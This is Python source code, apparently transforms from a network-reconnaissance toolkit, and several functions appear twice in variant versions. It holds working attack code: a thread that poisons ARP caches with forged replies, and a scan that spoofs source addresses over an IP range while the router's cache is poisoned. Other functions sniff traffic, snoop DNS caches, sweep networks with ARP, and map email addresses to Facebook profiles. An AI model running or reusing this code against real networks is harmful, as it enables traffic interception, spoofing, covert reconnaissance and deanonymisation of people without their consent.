def passivescan(network, response):
    """Sniff a bounded amount of traffic and add unseen hosts on ``network`` to ``response``.

    Captures ``config['scapy/sniffcount']`` frames (or stops after
    ``config['scapy/snifftimeout']`` seconds) and records the source and
    destination of every IP or ARP frame whose address lies inside
    ``network``.  Each newly seen address becomes an internal
    ``IPv4Address`` entity carrying the hardware address observed on the
    wire.  ``response`` is mutated in place via ``+=``; nothing is returned.
    """
    seen = set()
    debug('Sniffing network traffic for more hosts.')
    captured = sniff(count=config['scapy/sniffcount'],
                     timeout=config['scapy/snifftimeout'])
    debug('Analyzing traffic.')
    for frame in captured:
        if IP in frame:
            src, dst = frame[IP].src, frame[IP].dst
        elif ARP in frame:
            src, dst = frame[ARP].psrc, frame[ARP].pdst
        else:
            continue
        if src in network and src not in seen:
            seen.add(src)
            host = IPv4Address(src, internal=True)
            # The hardware address is whatever the captured frame claimed;
            # nothing here verifies it, so downstream consumers should treat
            # it as an observation rather than an authenticated fact.
            host += Field('ethernet.hwaddr', frame.src, displayname='Hardware Address')
            response += host
        # The broadcast destination is never a host; skip it explicitly.
        if dst in network and dst not in seen and frame.dst != 'ff:ff:ff:ff:ff:ff':
            seen.add(dst)
            host = IPv4Address(dst, internal=True)
            host += Field('ethernet.hwaddr', frame.dst, displayname='Hardware Address')
            response += host
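def findlocalneighbors(network, response):
    """Add the local netblock and its ARP-responsive hosts to ``response``.

    Emits one ``Netblock`` entity describing ``network`` (CIDR notation,
    mask, host count), ARP-sweeps the block and adds an internal
    ``IPv4Address`` with the replying hardware address for every answer.
    When the sweep yields at most one reply the function falls back to
    ``passivescan`` so hosts that ignore ARP probes can still be found by
    listening.

    Returns ``response`` (also mutated in place).
    """
    debug('ARP sweeping %s' % network.netblock)
    block = Netblock(network.netblock)
    block += Label('CIDR Notation', repr(network))
    block += Label('Network Mask', network.netmask)
    # Presumably ~netmask yields the host-bits mask and "- 1" drops the
    # broadcast address.  NOTE(review): confirm against IPNetwork's semantics.
    block += Label('Number of Hosts', int(~network.netmask) - 1)
    response += block
    answered = arping(repr(network),
                      timeout=config['scapy/sr_timeout'],
                      verbose=config['scapy/sr_verbose'])[0]
    for pair in answered:
        reply = pair[1]
        # Mark the host internal at construction time, the same way
        # passivescan builds this entity, instead of assigning the
        # attribute afterwards.
        host = IPv4Address(reply.psrc, internal=True)
        host += Field('ethernet.hwaddr', reply.hwsrc, displayname='Hardware Address')
        response += host
    if len(answered) <= 1:
        passivescan(network, response)
    return response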
def findlocalneighbors(network, response):
    """Describe ``network`` and enumerate the hosts on it that answer ARP.

    A ``Netblock`` entity with three labels (CIDR notation, network mask,
    host count) is added first.  Every ARP reply from the sweep becomes an
    ``IPv4Address`` marked internal and tagged with the replying hardware
    address.  If the sweep produced one reply or none, ``passivescan`` is
    run as a fallback to pick up quieter hosts from observed traffic.

    Returns ``response`` (also mutated in place).
    """
    debug('ARP sweeping %s' % network.netblock)
    summary = Netblock(network.netblock)
    for title, value in (
        ('CIDR Notation', repr(network)),
        ('Network Mask', network.netmask),
        # NOTE(review): assumes ~netmask is the host-bits mask — confirm.
        ('Number of Hosts', int(~network.netmask) - 1),
    ):
        summary += Label(title, value)
    response += summary
    replies = arping(
        repr(network),
        timeout=config['scapy/sr_timeout'],
        verbose=config['scapy/sr_verbose'],
    )[0]
    for pair in replies:
        reply = pair[1]
        host = IPv4Address(reply.psrc)
        host.internal = True
        host += Field('ethernet.hwaddr', reply.hwsrc, displayname='Hardware Address')
        response += host
    if len(replies) <= 1:
        passivescan(network, response)
    return response
def dotransform(request, response):
    """Run nmap with ``-n -A`` against ``request.value`` and fold the parsed
    report into ``response``.

    ``request.params`` are appended verbatim to the nmap argument list.
    NOTE(review): they are not validated here, so whoever controls the
    request can supply arbitrary nmap options (output-file flags, scripts,
    ...); constrain them at the boundary if requests may be untrusted.

    Returns ``response`` (also mutated in place by the ``add*`` helpers).
    """
    target = request.value
    scanner = NmapScanner()
    debug('Starting scan on host: %s' % target)
    args = ['-n', '-A', target]
    args.extend(request.params)
    report = scanner.scan(args, NmapReportParser)
    for add in (addports, addsystems):
        add(report, response)
    # The report section is labelled with the scan mode that produced it.
    addreport(report, response, '-A')
    return response
def dotransform(request, response):
    """Ask every configured resolver what it has cached for ``request.value``.

    Each resolver in ``config['dnscachelookup/resolvers']`` is queried for
    type 255 (ANY) with recursion disabled (``rd=0``), so only records the
    resolver already holds can come back.  Resolvers that do not answer
    (``nslookup`` returns ``None``) are skipped.  A list result contributes
    the ``an`` section of every element; a single reply contributes each of
    its ``DNS`` answer records in turn.

    Returns ``response`` (also mutated in place).
    """
    for resolver in config['dnscachelookup/resolvers']:
        debug('fetching from %s' % resolver)
        reply = nslookup(request.value, 255, resolver, rd=0)
        if reply is None:
            continue
        if isinstance(reply, list):
            for part in reply:
                addrecord(part.an, response)
        elif reply[DNS].ancount:
            count = reply[DNS].ancount
            for idx in range(count):
                addrecord(reply[DNS].an[idx], response)
    return response
def getuser(browser, uid, email):
    """Look up ``email`` through the typeahead search endpoint as viewer ``uid``.

    Returns the first element of the JSON ``payload.entries`` list, or
    ``None`` when ``uid`` is falsy, the HTTP status is not 200, or no
    entries came back.  Raises ``Exception`` built from the service's
    ``errorSummary``/``errorDescription`` when the decoded object has an
    ``error`` key.  The endpoint is reached over plain HTTP, so the viewer
    id and the looked-up address travel in cleartext.
    """
    if not uid:
        return None
    query = urlencode({"viewer": uid, "value": email, "__a": 1})
    reply = browser.open("http://www.facebook.com/ajax/typeahead/search.php?%s" % query)
    if reply.code != 200:
        return None
    body = reply.read()
    # The body carries a non-JSON prefix; parse from the first brace onward.
    decoded = loads(body[body.find("{"):])
    if "error" in decoded:
        raise Exception("%s: %s" % (decoded["errorSummary"], decoded["errorDescription"]))
    entries = decoded["payload"]["entries"]
    if not entries:
        return None
    debug(entries[0])
    return entries[0]
def getuser(browser, uid, email):
    """Resolve ``email`` via the typeahead search endpoint, acting as viewer ``uid``.

    Returns the first ``payload.entries`` element of the decoded reply, or
    ``None`` if ``uid`` is falsy, the status code is not 200, or the entry
    list is empty.  An ``error`` key in the reply raises ``Exception`` with
    the service's summary and description.  Note the request is plain HTTP.
    """
    if uid:
        url = "http://www.facebook.com/ajax/typeahead/search.php?%s" % urlencode(
            {'viewer': uid, 'value': email, '__a': 1})
        reply = browser.open(url)
        if reply.code == 200:
            entries = _typeahead_entries(reply.read())
            if entries:
                debug(entries[0])
                return entries[0]
    return None


def _typeahead_entries(raw):
    """Strip the non-JSON prefix from ``raw``, decode it and return ``payload.entries``.

    Raises ``Exception`` carrying ``errorSummary: errorDescription`` when the
    decoded object has an ``error`` key.
    """
    decoded = loads(raw[raw.find('{'):])
    if 'error' in decoded:
        raise Exception(
            "%s: %s" % (decoded['errorSummary'], decoded['errorDescription']))
    return decoded['payload']['entries']
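def dotransform(request, response):
    """Check the DNS server at ``request.value`` for cached answers to well-known names.

    An ordinary lookup is sent first; if it gets no reply a ``UIMessage`` is
    added and nothing else is done.  Otherwise each name in ``topsites`` is
    queried with recursion disabled (``rd=0``), so a non-empty answer section
    means the record was already in the server's cache.  Cached answers are
    rendered as an HTML ``Table`` attached to a ``DNSName`` entity.

    Returns ``response`` (also mutated in place).
    """
    ip = request.value
    if nslookup("www.google.ca", nameserver=ip) is None:
        response += UIMessage('DNS server did not respond to initial DNS request.')
        return response
    for site in topsites:
        debug('Resolving %s' % site)
        ans = nslookup(site, nameserver=ip, rd=0)
        # A per-site query can time out and yield None just like the initial
        # probe; previously this was dereferenced unconditionally and raised
        # TypeError on the first unanswered name.
        if ans is None or not ans[DNS].ancount:
            continue
        entity = DNSName(site)
        table = Table(['Name', 'Query Class', 'Query Type', 'Data', 'TTL'], 'Cached Answers')
        for idx in range(ans[DNS].ancount):
            rr = ans[DNS].an[idx]
            table.addrow([
                rr.rrname.rstrip('.'),
                rr.sprintf('%rclass%'),
                rr.sprintf('%type%'),
                rr.rdata.rstrip('.'),
                rr.sprintf('%ttl%'),
            ])
        entity += Label('Cached Answers', table, type='text/html')
        response += entity
    return response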
def run(self):
    """Thread body: keep sending an unsolicited ARP ``is-at`` reply for the
    currently queued victim address.

    Blocks on the module-level queue ``q`` for the first address, builds one
    Ethernet/ARP frame (hardware source ``self.mac``, destination
    ``self.rmac``) advertising that address, then loops: a newly queued
    address replaces ``psrc``; ``None`` on the queue ends the thread; while
    the queue is empty the frame is re-sent and the loop sleeps
    ``1/self.poison_rate`` seconds.  ``get_nowait`` is used so the send loop
    never blocks on the queue.
    NOTE(review): under Python 2 integer division ``1/self.poison_rate`` is
    0 for any integer rate above 1 — confirm the type of ``poison_rate``.
    """
    debug('ARP cache poisoning thread waiting for victims...')
    ip = q.get()
    debug('Acquired first victim... %s' % ip)
    pe = Ether(src=self.mac, dst=self.rmac)
    pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)
    while True:
        try:
            # Non-blocking poll: the Empty branch below is the steady state.
            ip = q.get_nowait()
            if ip is None:
                break
            else:
                debug('Changing victim to %s...' % ip)
                pa.psrc = ip
        except Empty:
            # Send the poison... all your base are belong to us!
            sendp(pe/pa, verbose=0)
            sleep(1/self.poison_rate)
def findremoteneighbors(ip, response):
    """Find hosts that sit behind the same last-hop router as ``ip`` and add
    them to ``response``.

    As implemented below:
      1. Resolve ``ip``'s netblock via ARIN whois and emit a ``Netblock``
         entity (CIDR notation, mask, host count).  Blocks wider than /24
         are narrowed to the /24 containing ``ip`` before any probing.
      2. Send a TCP probe to ``ip`` on ports 0-1024 and keep the first
         answering port as ``dport`` for every later probe.
      3. Trace the route to ``ip``; the second-to-last hop is accepted as
         the router only when its TTL is exactly one less than the last
         hop's, otherwise the function gives up.
      4. Probe the whole (possibly narrowed) block with that TTL; each
         address whose reply originates from the router's address is
         emitted as an ``IPv4Address``, flagged ``alive`` when it also
         answers a direct probe.

    Returns ``response`` (also mutated in place).  Only the netblock entity
    is emitted when ``ip`` does not answer the initial probe.
    """
    debug('Doing an ARIN whois lookup...')
    w = objectify(whoisip(ip, accept='application/xml'))
    network = IPNetwork([w.startAddress, w.endAddress])
    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    # NOTE(review): assumes ~netmask is the host-bits mask — confirm.
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e
    if network.cidrlen < 24:
        # Bound the scope of the later sweep to one /24 around the target.
        debug(
            'According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...'
            % network.cidrlen)
        network.netblock = '%s/24' % ip
    debug('Probing the host on TCP ports 0-1024...')
    r = sr1(IP(dst=str(ip)) / TCP(dport=(0, 1024)),
            timeout=config['scapy/sr_timeout'],
            verbose=config['scapy/sr_verbose'],
            retry=config['scapy/sr_retries'])
    # Only the first reply is used; sr1 returns None when nothing answers.
    if r is not None and r.src == ip:
        dport = r.sport
        debug('Performing a traceroute to destination %s' % ip)
        ans = traceroute2(str(ip), TCP(dport=dport),
                          timeout=config['scapy/sr_timeout'],
                          verbose=config['scapy/sr_verbose'],
                          retry=config['scapy/sr_retries'])
        # NOTE(review): ans[-2] raises IndexError when the trace has fewer
        # than two hops — confirm traceroute2 always returns at least two.
        l_hop = ans[-1]
        sl_hop = ans[-2]
        if sl_hop['ttl'] != l_hop['ttl'] - 1:
            debug(
                "It takes %d hops to get to %s but we could only find the router at hop %d (%s)."
                % (l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip']))
            debug("Can't find second last hop... aborting...")
        else:
            debug(
                'It takes %d hops to get to %s and it is attached to router %s...'
                % (l_hop['ttl'], ip, sl_hop['ip']))
            debug('Sending probe packets to %s with ttl %d...' % (network, sl_hop['ttl']))
            ans = sr(IP(dst=repr(network), ttl=sl_hop['ttl']) / TCP(dport=dport),
                     timeout=config['scapy/sr_timeout'],
                     verbose=config['scapy/sr_verbose'],
                     retry=config['scapy/sr_retries'])[0]
            # 'r' is reused for (sent, received) pairs; the earlier sr1
            # reply is no longer needed at this point.
            for r in ans:
                if r[1].src == sl_hop['ip']:
                    debug('%s is attached to the same router...' % r[0].dst)
                    e = IPv4Address(r[0].dst)
                    alive = sr1(IP(dst=r[0].dst) / TCP(dport=dport),
                                timeout=config['scapy/sr_timeout'],
                                verbose=config['scapy/sr_verbose'],
                                retry=config['scapy/sr_retries'])
                    if alive is not None:
                        e += Field('alive', 'true')
                    response += e
    return response
def findremoteneighbors(ip, response):
    """Locate hosts sharing ``ip``'s last-hop router and add them to ``response``.

    The netblock comes from an ARIN whois lookup and is emitted as a
    ``Netblock`` entity; anything wider than /24 is narrowed to the /24 that
    contains ``ip`` before probing.  A TCP probe on ports 0-1024 picks the
    ``dport`` used afterwards.  A traceroute to ``ip`` supplies the
    second-to-last hop, accepted as the router only when its TTL is one less
    than the final hop's.  The block is then probed with that TTL and every
    address whose reply comes from the router's address is emitted as an
    ``IPv4Address``, marked ``alive`` when a direct probe is answered too.

    Returns ``response`` (also mutated in place); nothing beyond the netblock
    entity is added when ``ip`` never answers the first probe.
    """
    debug('Doing an ARIN whois lookup...')
    w = objectify(whoisip(ip, accept='application/xml'))
    network = IPNetwork([w.startAddress, w.endAddress])
    e = Netblock(network.netblock)
    e += Label('CIDR Notation', repr(network))
    e += Label('Network Mask', network.netmask)
    # NOTE(review): presumably ~netmask is the host-bits mask — verify.
    e += Label('Number of Hosts', int(~network.netmask) - 1)
    response += e
    if network.cidrlen < 24:
        # Keep the sweep bounded to a single /24 around the target.
        debug('According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...' % network.cidrlen)
        network.netblock = '%s/24' % ip
    debug('Probing the host on TCP ports 0-1024...')
    r = sr1(
        IP(dst=str(ip))/TCP(dport=(0,1024)),
        timeout=config['scapy/sr_timeout'],
        verbose=config['scapy/sr_verbose'],
        retry=config['scapy/sr_retries']
    )
    # sr1 yields the first reply or None; the source check guards against
    # replies from intermediate devices.
    if r is not None and r.src == ip:
        dport = r.sport
        debug('Performing a traceroute to destination %s' % ip)
        ans = traceroute2(
            str(ip),
            TCP(dport=dport),
            timeout=config['scapy/sr_timeout'],
            verbose=config['scapy/sr_verbose'],
            retry=config['scapy/sr_retries']
        )
        # NOTE(review): indexing ans[-2] needs at least two hops — confirm
        # traceroute2 guarantees that, otherwise this raises IndexError.
        l_hop = ans[-1]
        sl_hop = ans[-2]
        if sl_hop['ttl'] != l_hop['ttl'] - 1:
            debug(
                "It takes %d hops to get to %s but we could only find the router at hop %d (%s)."
                % (l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip'])
            )
            debug("Can't find second last hop... aborting...")
        else:
            debug('It takes %d hops to get to %s and it is attached to router %s...' % (l_hop['ttl'], ip, sl_hop['ip']))
            debug('Sending probe packets to %s with ttl %d...' % (network, sl_hop['ttl']))
            ans = sr(
                IP(dst=repr(network), ttl=sl_hop['ttl'])/TCP(dport=dport),
                timeout=config['scapy/sr_timeout'],
                verbose=config['scapy/sr_verbose'],
                retry=config['scapy/sr_retries']
            )[0]
            # From here 'r' holds (sent, received) pairs, not the sr1 reply.
            for r in ans:
                if r[1].src == sl_hop['ip']:
                    debug('%s is attached to the same router...' % r[0].dst)
                    e = IPv4Address(r[0].dst)
                    alive = sr1(
                        IP(dst=r[0].dst)/TCP(dport=dport),
                        timeout=config['scapy/sr_timeout'],
                        verbose=config['scapy/sr_verbose'],
                        retry=config['scapy/sr_retries']
                    )
                    if alive is not None:
                        e += Field('alive', 'true')
                    response += e
    return response
def dotransform(request, response):
    """Probe ``dst`` once per source address in ``request.value`` and record
    each port's status in ``response``.

    Target ports and host come from the parsed ``request.params``, falling
    back to ``config['irsscan/target_ports']`` and
    ``config['irsscan/target_host']``.  For every address in
    ``iprange(request.value)`` the template's IP source is rewritten to that
    address, the address is handed to the ``ArpCachePoisoner`` thread through
    the module-level queue ``q`` (see its ``run``), and the probes are sent
    with ``srp``.  Each answered probe becomes a ``Port`` entity whose status
    follows the TCP flags (RST -> Closed, otherwise Open) or an ICMP reply
    (TimedOut); unanswered probes are TimedOut with response ``'none'``.
    ``None`` is queued at the end to stop the helper thread before joining it.

    Returns ``response`` (also mutated in place).
    """
    params = parse_args(request.params)
    ports = portrange(params.target_ports) if params.target_ports is not None else config['irsscan/target_ports']
    dst = params.target_host if params.target_host is not None else config['irsscan/target_host']
    # The helper thread reads victims from this module-level queue.
    global q
    q = Queue()
    debug('Sending probes to %s' % dst)
    # This is the template used to send traffic
    p = Ether()/IP(dst=dst, id=int(RandShort()))/TCP(dport=ports, sport=int(RandShort()), seq=int(RandInt()))
    # We need to fix these values so that Scapy doesn't poop all over them
    # (reading the fields once freezes the resolved hardware addresses so
    # they are not re-resolved on every send).
    p.dst = router_mac = p.dst
    p.src = my_mac = p.src
    # Begin the evil... mwuahahahahaha..
    apw = ArpCachePoisoner(my_mac, router_mac)
    apw.start()
    # Loop through our IP address block and send out the probes
    for i in iprange(request.value):
        # Queue and set the current IP we are poisoning for the poisoner.
        q.put(str(i))
        p[IP].src = str(i)
        sleep(0.5)
        # Send the probes!
        ans, unans = srp(
            p,
            retry=config['irsscan/sr_retries'],
            timeout=config['irsscan/sr_timeout'],
            verbose=config['irsscan/sr_verbose']
        )
        if ans:
            for a in ans:
                req, res = a
                e = Port(req.dport)
                e.source = req[IP].src
                e.destination = req[IP].dst
                e += Label('Summary', res.summary())
                if TCP in res:
                    e.response = res[TCP].sprintf('TCP:%flags%')
                    # Flag bit 0x04 is RST: a reset means the port is closed.
                    e.status = PortStatus.Closed if (res[TCP].flags & 4) else PortStatus.Open
                elif ICMP in res:
                    e.response = res[ICMP].sprintf('ICMP:%type%')
                    e.status = PortStatus.TimedOut
                response += e
        if unans:
            for u in unans:
                e = Port(u.dport)
                e.source = u[IP].src
                e.destination = u[IP].dst
                e.status = PortStatus.TimedOut
                e.response = 'none'
                response += e
    # Goodbye!
    q.put(None)
    apw.join()
    return response
def onterminate(*args):
    """Termination callback: log a line and exit with status 0.

    ``*args`` absorbs whatever the registering API passes (a signal handler,
    for example, receives the signal number and the current frame); the
    values are not used.
    """
    message = 'Terminated.'
    debug(message)
    exit(0)
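def onterminate(*args):
    """Signal callback: log a line and exit with status 0.

    Accepts and ignores any positional arguments so it can be registered
    directly as a signal handler (which is invoked with the signal number
    and the current frame); the previous zero-argument signature raised
    ``TypeError`` when called that way.  Calling it with no arguments, as
    before, still works.
    """
    debug('Caught signal... exiting.')
    exit(0)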
def dotransform(request, response):
    """Demo transform: report progress, then return ``response`` with a
    ``Phrase`` greeting built from ``request.value`` appended to it."""
    progress(50)
    debug('This was pointless!')
    progress(100)
    greeting = Phrase('Hello %s' % request.value)
    return response + greeting